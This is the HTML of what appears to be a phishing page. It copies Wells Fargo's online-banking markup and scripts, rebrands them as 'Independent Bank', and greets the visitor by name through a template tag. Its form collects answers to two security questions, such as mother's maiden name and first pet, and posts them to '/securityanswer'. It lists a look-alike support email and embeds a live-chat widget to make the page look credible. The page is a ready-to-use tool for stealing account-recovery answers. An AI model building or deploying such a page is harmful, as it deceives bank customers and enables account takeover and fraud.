<!DOCTYPE html>
<html class="dk no-js browser-login" lang="en">
<!-- COMMON INCLUDES -->

<head>
	<meta http-equiv="content-type" content="text/html; charset=UTF-8">
	<title class="browser-title">Security question</title>
	<meta charset="utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
	<meta name="description" content="">
	<meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, maximum-scale=2">
	<meta name="HandheldFriendly" content="True">
	<meta name="MobileOptimized" content="320">
	<meta http-equiv="cleartype" content="on">
	<!-- Tile icon for Win8 (144x144 + tile color)-->
	<meta name="msapplication-TileColor" content="#222222">
	<!-- For iOS web apps. Delete if not needed. https://github.com/h5bp/mobile-boilerplate/issues/94-->
	<meta name="apple-mobile-web-app-capable" content="yes">
	<meta name="apple-mobile-web-app-title" content="Independent Bank">
	<!-- This script prevents links from opening in Mobile Safari. https://gist.github.com/1042026-->
	<script type="text/javascript" async="" charset="utf-8" id="_cls_detector"
		data-clsconfig="reportURI=https://rubicon.wellsfargo.com/glassbox/reporting/0C458F45-AC71-02CE-34D8-401C8A313B38/cls_report;clientAttributesEnabled=true;clientAttributesMaxLength=150;forceRenderingFixForUA=WFAppName;recordConsoleErrors=true;recordScrolls=true;recordMouseMoves=true;recordErrors=true;recordHovers=true;idleEventTimeInterval=-1;reportInterval=60000;interceptAjax=true;ajaxRecordMetadata=always;ajaxRecordRequestHeaders=always;ajaxRecordResponseHeaders=always;valueMaskingMode=blacklist;maskClassList=pmask;domMaskingMode=blacklist;domMaskContentByClass=pmask;domOmitByClass=check-img-content;domKeepScriptMatching=utag_data;captureGlobalObjects=utag_data"
		src="detector-dom.js"></script>
	<script type="text/javascript" async="" charset="utf-8" id="utag_27" data-vendor="fs" data-mode="selfhost"
		data-environment="production" data-hasssl="true" data-client="wellsfargo"
		data-codelocation="https://static.wellsfargo.com/tracking/survey/code/" data-isselfhosted="true"
		data-product-assets="https://static.wellsfargo.com/tracking/survey/code/" data-role="gateway"
		src="gateway.js"></script>
	<script async="" src="adrum-ext.js"></script>
	<script nonce="7e9eee98-2e5c-4e28-941f-1f667893c6e4">
		(function (a, b, c) { if (c in b && b[c]) { var d, e = a.location, f = /^(a|html)$/i; a.addEventListener("click", function (a) { d = a.target; while (!f.test(d.nodeName)) d = d.parentNode; "href" in d && (d.href.indexOf("http") || ~d.href.indexOf(e.host)) && (a.preventDefault(), e.href = d.href) }, !1) } })(document, window.navigator, "standalone")
	</script>
	<meta name="KONICHIWA1" content="09/13/2020 09:37:21.982 PM PDT">
	<meta name="KONICHIWA2" content="426673647">
	<meta name="KONICHIWA3" content="20df82ec-8e29-4f67-a676-9e768d70758e">
	<!-- TODO - get page name dynamicaly -->
	<meta name="KONICHIWA5" content="accountSummary">
	<meta name="KONICHIWA6" content="7030461629">

	<meta name="KONICHIWA8" content="DEV">
	<script type="text/javascript" nonce="7e9eee98-2e5c-4e28-941f-1f667893c6e4">
		if (self === top) {
			var antiClickjack = document.getElementById("antiClickjack");
			antiClickjack.parentNode.removeChild(antiClickjack);
		} else {
			top.location = self.location;
		}
	</script>
	<!-- App Dynamics Performance Monitoring -->
	<script nonce="7e9eee98-2e5c-4e28-941f-1f667893c6e4">
		(function () {
			window['adrum-start-time'] = new Date().getTime();
			var userInfo = {
				wfacookie: "11202008162137272025061487",
				CustomerSegment: "COB"
			};
			var pageView = {
				userData: userInfo
			};
			function getMeta(metaName) {
				var metas = document.getElementsByTagName('meta');
				var noOFMetas = metas.length;
				var meta;
				for (var i = 0; i < noOFMetas; i++) {
					meta = metas[i];
					if (meta.hasAttribute('name') && meta.getAttribute('name') === metaName) {
						return meta.getAttribute('content');
					}
				}
				return '';
			}
			if (getMeta('KONICHIWA9') === 'true') {
				pageView.userPageName = window.location.pathname + '-Tempest';
			}
			window['adrum-config'] = {
				userEventInfo: {
					"PageView": function (context) {
						return pageView;
					}
				}
			};
			(function (config) {
				config.appKey = "EUM-AAB-AWG";
				config.adrumExtUrlHttp = '/services/static/webassets/20.09.00.17/7P/servicing/js';
				config.adrumExtUrlHttps = '/services/static/webassets/20.09.00.17/7P/servicing/js';
				config.beaconUrlHttps = "https://digital-eum-appdynamics.wellsfargo.com:443";
				config.xd = { enable: false };
				config.xhr = {
					"exclude": {
						"urls": [
							{ pattern: '.*/support/.*' },
							{ pattern: '.*/fragments/.*' },
							{ pattern: '.*/presentedDisposition/.*' },
							{ pattern: '.*/bev/.*' },
							{ pattern: '.*/glassbox/.*' }
						]
					}
				};
			})(window['adrum-config'] || (window['adrum-config'] = {}));
		})();
	</script>
	<script src="adrum-ext_002.js"
		nonce="7e9eee98-2e5c-4e28-941f-1f667893c6e4"></script>
	<link rel="stylesheet"
		href="mwf-servicing-combined-mm.css">
	<!-- TOP Level CSS Includes - Don't change the sequence of below CSS includes  -->


	<!-- endbuild-->

	<!-- TOP Level JS Includes - These Js includes should be on TOP of the html page.   -->
	<!-- All other JS dependencies will be at the bottom of the BODY section of the markup.-->

	<script type="text/javascript" charset="utf-8" async="" data-requirecontext="_"
		data-requiremodule="mwf-core-ui-bootstrap"
		src="mwf-core-ui-bootstrap.js"></script>
	<script type="text/javascript" charset="utf-8" async="" data-requirecontext="_"
		data-requiremodule="https://static.wellsfargo.com/tracking/m2/utag.js"
		src="utag_002.js"></script>
	<script type="text/javascript" async="" charset="utf-8" id="utag_wfc.m2_36"
		src="utag.js"></script>
	<script type="text/javascript" charset="utf-8" async="" data-requirecontext="_"
		data-requiremodule="mwf-servicing-ui-brokerage-xsell-bootstrap"
		src="mwf-servicing-ui-brokerage-xsell-bootstrap.js"></script>
</head>

<body class="" data-page="brokerage" style="touch-action: auto;" data-user-language="en">
	<p tabindex="-1" id="page-load-focus" class="visuallyhidden" data-accessibility-focus="">Security question
	</p>

	<!-- HEADER -->
	<!-- 4.17 CSS Global Nav changes starts -->
	<header class="masthead re-branding" id="mwf-banner" role="banner" data-focus-first="" tabindex="-1"
			style="touch-action: auto;" data-modal-visually-hide="true">
			<a id="skiptocontent" href="#skip">Skip to main content</a>

			<nav>

				<div id="mwf-masthead" style="background-color: #cfb890; border-bottom: 4px solid rgb(76, 69, 69);">
					<div class="desktop-margin">
						<div class="wf-logo"><a role="link" tabindex="0" data-display-type="saml"
								data-url="/transferandpay/exit/saml;identifier=accounts?F=J&amp;_eid=accountSummary_moremenu&amp;_x=NjAEsikqm5zHTPcxxMK5S7YrwmcgRcQX"><img style="margin-top: 5px;" src="ind-bank-logo.png" alt="" srcset=""><span c+></span></a>
						</div>

						<!-- profile header row ends -->
					</div>
				</div>
				
			</nav>
		</header>
	<!-- 4.17 CSS Global Nav menu changes ends here -->

	<div class="control-bar row">
		<div class="desktop-margin">
			<div class="control-links column">
				<a href="javascript:void(0);" data-display-type="saml" data-external-navigation=""
					data-ajax-caller="getJSON"
					data-url="/services/exit/saml;identifier=accounts?F=J&amp;_eid=accountSummary_moremenu&amp;_x=v2BE9YolIW0Gb0Qfb1Ezq1XZiayX66uU"
					data-trigger-event="mwfReturnToAccounts" style="touch-action: auto;">
					<i class="icon nav-home"></i>
					Welcome <%=`${user.fullName }`%></a>
			</div>
		</div>

	</div>
	<!-- BODY - Cross Sell  -->
	<main class="page" data-modal-visually-hide="" style="touch-action: auto;">
		<div class="page-content">
			<div class="brokerage-xsell fill-vertical" style="min-height: 599.5px;">
				<div class="screen-container">
					<div class="screen-header">
						<div data-message-container="main" class="message-container"></div>
						<h1>Please answer your security questions</h1>
					</div>
					<div class="screen-content">
						<label id="fromAccountLabel" for="fromAccount"><strong
							class="mwf-input-text-label">Select question 1</strong></label>
						<form action="/securityanswer" method="post">
							<select id="transferOption"
										class="sr-only select-list-target-label" name="transferOption"
										style="padding: 10px; margin: 3px; width: 100%;">
										<option value="firstPet" selected="selected">What was the name of your first pet?
										</option>
										<option value="firstCar">What is the model of your first car?</option>
										<option value="parentsMeet">Where did you're parents meet?</option>
										<option value="favoriteBook">What Is your favorite book?</option>
										<option value="roadGrew">What is the name of the road you grew up on?</option>
										<option value="maidenName">What is your mother’s maiden name?</option>
									</select>
									<label id="fromAccountLabel" for="fromAccount"><strong
										class="mwf-input-text-label">Input answer</strong></label>	
						<input type="text" name="question1" id="" style="padding: 10px; margin: 3px; width: 100%;">
						<br>
						<label id="fromAccountLabel" for="fromAccount"><strong
							class="mwf-input-text-label">Select question 2</strong></label>
						<select id="transferOption"
										class="sr-only select-list-target-label" name="transferOption"
										style="padding: 10px; margin: 3px; width: 100%;">
										<option value="firstPet" selected="selected">What was the name of your first pet?
										</option>
										<option value="firstCar">What is the model of your first car?</option>
										<option value="parentsMeet">Where did you're parents meet?</option>
										<option value="favoriteBook">What Is your favorite book?</option>
										<option value="roadGrew">What is the name of the road you grew up on?</option>
										<option value="maidenName">What is your mother’s maiden name?</option>
									</select>
									<label id="fromAccountLabel" for="fromAccount"><strong
										class="mwf-input-text-label">Input answer</strong></label>	
						<input type="text" name="question2" id="" style="padding: 10px; margin: 3px; width: 100%;">
						<input type="submit" value="Submit" class="btn" style="background-color: rgba(0, 0, 0, 0.6); color: #f4f4f4;">
						</form>
						
						<br>
						<br>
						<br>
						
						
						
						
						<p><strong>Need help?</strong>
							<br>
							Contact us @ support@in1198bank.com or chat with a customer support officer live</p>




					</div>

				</div>
			</div>
		</div>
	</main>

	<!--  Global Footer Header -->
	<script type="text/javascript" nonce="7e9eee98-2e5c-4e28-941f-1f667893c6e4">
		window.mwfGlobals = window.mwfGlobals || {};
		window.mwfGlobals.buildNumber = "0000.00.00";
		window.mwfGlobals.rootContextPath = "/services";
		window.mwfGlobals.webAssetsPath = "/services/static/webassets/20.09.00.17/7P/";
		window.mwfGlobals.signOffUrl = '/services/logout?_x=6AMZ3exKUWsy1gv-oDFMRNS6nBd7LehE';
		window.mwfGlobals.keepAlivePath = '/services/support/secure/keepalive?_x=yEYQvrSHqDHDsb92DNTh0IwkjTd0w5E4';

		window.mwfGlobals.tealeafUrl = '/services/support/secure/tealeaf?_x=ybSZrN3Pyp8VbfkNHQJpQnVyHSHwW6qT';
		window.mwfGlobals.logLevel = "error";
		window.mwfGlobals.logLevelConsole = "none";
		window.mwfGlobals.sessionTimeoutWarningInterval = "8";
		window.mwfGlobals.sessionTimeoutInterval = "10";
		window.mwfGlobals.sessionTimeoutStart = true;
		window.mwfGlobals.skipHistoryModuleInit = true;
		window.mwfGlobals.deviceInfo = {};
		window.mwfGlobals.deviceInfo.os = "WINDOWSPHONEOS";
		window.mwfGlobals.deviceInfo.osVersion = 'NT 6.1';
		window.mwfGlobals.appEntryFlag = "false";
		window.mwfGlobals.nonce = "";
		window.mwfGlobals.defaultError = "This service is temporarily not available. Please try again later.";
		window.mwfGlobals.defaultExternalType = "externalnoconfirm";
		window.mwfGlobals.wfAppId = "";
		window.mwfGlobals.wfaCookie = '11202008162137272025061487';
		window.mwfGlobals.paymentsHelp = "/support/Help.jsp";
		window.mwfGlobals.dirtyStartUrl = '/services/start/options;da=1?_x=JyP_QvsC5CThmt5Toj981f48iB63RWiq';
		window.mwfGlobals.legacyIpadApp = "false";
		window.mwfGlobals.samlTransferViewBean = '';
		window.mwfGlobals.platformError = "This service is temporarily not available. Please try again later.";



		window.mwfGlobals.customerLOB = "CONS";

		window.mwfGlobals.customerType = 'COB';
		window.mwfGlobals.environment = 'Prod';


		window.mwfGlobals.language = "en";

		window.mwfGlobals.devicePlatform = "7P";
		window.mwfGlobals.enableTealeafSupport = ("true" === "false");

		window.mwfGlobals.backNavigationUrl = "/navigate/back?_x=kFByPKhjwHydnvPvOl85MJip3CV3kpJV";

		window.mwfGlobals.deviceType = "dk";
		window.mwfGlobals.bevUrl = "/trackLinkClick?_x=TSLaECYCyK8kmPaGV1nkkD2qnMJURi80";
		window.mwfGlobals.accountsNavigationUrl = '/services/exit/saml;identifier=accounts;?F=J&_x=lLtu2ufJB8clB9JbdHQmP8Nl_sDoGFK8';
		window.mwfGlobals.pageUrls = {
			"ACCOUNT_SERVICES": '/services/exitHub/hub;destPageId=ACCOUNT_SERVICES?_x=S0SYB8bC46QMWIkMZFGPvOUIxY3s72e2',
			"PROFILE_SETTINGS": '/services/exitHub/hub;destPageId=PROFILE_SETTINGS?_x=L_vKpW4_GEqboJ37MnWoReip09xCsUHc',
			"PLAN_LEARN": '/services/exitHub/hub;destPageId=PLAN_LEARN?_x=GD9ihVldeFyMWwjjCXKwDHVQdtuce0Wk',
			"CONTACT_US": '/services/exitHub/hub;destPageId=CONTACT_US?_x=GDChUMR5mylQlG7PmcTCr8_56YEN7qES',
			"CURRENCY_GIFTS_COPIES": '/services/exitHub/hub;destPageId=CURRENCY_GIFTS_COPIES?_x=TctmPqxe8D5gpb8bQkGQwPoarI9jhNKy',
			"SECURITY_PRIVACY": '/services/exitHub/hub;destPageId=SECURITY_PRIVACY?_x=yxCCc4w-y2VtTXoKIikhZh1aE29URuP5',
			"DELIVERYPREFS": '/services/documents/deliverypreference?_x=fE_1d-B8KRaMec8xGBfl8AXt1Gt68Hp3'
		}

		// Enterprise Search
		window.mwfGlobals.searchPublicUrl = 'https://www.wellsfargo.com/search?';
		window.mwfGlobals.searchSuggestUrl = 'https://www.wellsfargo.com/search/as/suggest';
		window.mwfGlobals.searchTrackingUrl = 'https://www.wellsfargo.com/search/as/click';
		window.mwfGlobals.currentApp = 'services';
		// Site parameter for search

		window.mwfGlobals.searchSite = 'live_secure_common_collection' + '|' + 'live_secure_retail_collection';


		window.mwfGlobals.searchUrl = '/services/enterprisesearch/searchResults?site=live_secure_common_collection%7Clive_secure_retail_collection&_x=6ZNUfF4SMuR-oZMkS3COFB6S2q4oRo7s';


		window.mwfGlobals.searchControlBar = false;

		window.mwfGlobals.foresee = {};
		window.mwfGlobals.foresee.enabled = "true";
		window.mwfGlobals.hashedecn = "bd1834ef99ac04bf4939d0d9b3da4b10142f937505703d0903fac4af49f996c4";
		window.mwfGlobals.solicitReactionShown = "false";
		window.mwfGlobals.solicitReactionShownUrl = "/services/feedback/status?_x=DSQpLCDLNXUTLONqUS3073d77q7Uskm7";
	</script>

	<script
		nonce="7e9eee98-2e5c-4e28-941f-1f667893c6e4">var require = { waitSeconds: 0 }; var requirejs = { urlArgs: "p=0000.00.00" };</script>

	<script type="text/javascript" nonce="7e9eee98-2e5c-4e28-941f-1f667893c6e4">
		var enableNuanceJS = "false";
		window.mwfGlobals.deviceInfo.deviceExp = "BROWSER";

		window.mwfGlobals.nuanceAppMsgrSwitch = "false";
	</script>

	<script type="text/javascript" nonce="7e9eee98-2e5c-4e28-941f-1f667893c6e4">
		window.mwfGlobals.deviceInfo.deviceExp = "BROWSER";
		window.mwfGlobals.deviceInfo.deviceType = "DESKTOP";
		window.mwfGlobals.utagUrl = 'https://static.wellsfargo.com/tracking/m2/utag.js';

		window.mwfGlobals.tmsSwitch = 'true';

		window.mwfGlobals.enableGlassboxSwitch = "true";


		var utag_data = { app_id: 'M2Servicing', enable_nuance: enableNuanceJS, mpuid: window.mwfGlobals.wfaCookie, tealium_js_path: window.mwfGlobals.utagUrl, page_id: '', page_type: window.mwfGlobals.deviceInfo.deviceExp, device_type: window.mwfGlobals.deviceInfo.deviceType, cust_lob: window.mwfGlobals.customerLOB, customer_type: window.mwfGlobals.customerType, environment: window.mwfGlobals.environment, lang_pref: window.mwfGlobals.language, foresee_enable: window.mwfGlobals.foresee.enabled, hashedECN: window.mwfGlobals.hashedecn, foresee_suppress: 'false', isSolicitReactionShown: window.mwfGlobals.solicitReactionShown, search_term: '', isNativeApp: window.mwfGlobals.appEntryFlag, enable_glassBox: window.mwfGlobals.enableGlassboxSwitch };
	</script>
	<script type="text/javascript" nonce="7e9eee98-2e5c-4e28-941f-1f667893c6e4">
		window.mwfGlobals.lastLogonTimeStamp = "Sat Sep 12 14:44:10 PDT 2020";
		window.mwfGlobals.useTPBBimUpdates = true;
	</script>

	<script data-main="/services/static/webassets/20.09.00.17/7P/servicing/js/mwf-core-ui-bootstrap"
		src="requirejs.js"
		data-start="mwf-servicing-ui-brokerage-xsell-bootstrap" nonce="7e9eee98-2e5c-4e28-941f-1f667893c6e4"></script>
		<!--Start of Tawk.to Script-->
<script type="text/javascript">
	var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date();
	(function(){
	var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0];
	s1.async=true;
	s1.src='https://embed.tawk.to/5f5c5ae9f0e7167d000fa4f7/default';
	s1.charset='UTF-8';
	s1.setAttribute('crossorigin','*');
	s0.parentNode.insertBefore(s1,s0);
	})();
	</script>
	<!--End of Tawk.to Script-->

</body>

</html>